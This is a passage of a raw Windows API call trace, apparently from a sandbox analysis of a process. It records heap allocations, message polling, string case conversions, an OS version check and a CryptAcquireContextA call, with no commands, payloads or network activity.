hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0204.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0204.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0204.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0204.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0204.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0204.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0204.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0204.749] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0204.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0204.749] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0204.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0204.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0204.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0204.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0204.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0204.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0204.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0204.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0204.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0204.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0204.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0204.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0204.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0204.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0204.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0204.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.750] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0204.750] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0204.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0204.751] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.751] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.751] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0204.751] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.751] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0204.751] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0204.751] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.752] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0204.752] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0204.752] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0204.752] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0204.753] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0204.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0204.753] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0204.753] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.753] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0204.753] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0204.753] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0204.753] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0204.753] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0204.753] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0204.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7220, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0204.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0204.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0204.754] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c220) returned 1 [0204.754] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.754] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.754] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0204.754] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.755] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0204.755] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.755] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.755] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.755] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.755] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.755] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.755] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0204.755] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.755] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0204.755] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.755] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.755] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.755] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.755] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0204.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.755] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0204.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.756] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0204.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.756] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0204.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.756] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0204.756] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0204.756] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0204.756] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0204.756] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0204.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.756] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0204.756] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.756] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0204.756] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.756] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.756] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.757] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0204.757] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.757] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0204.757] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.757] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.757] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0204.757] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.757] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0204.757] PeekMessageW (in: lpMsg=0x8cef58, 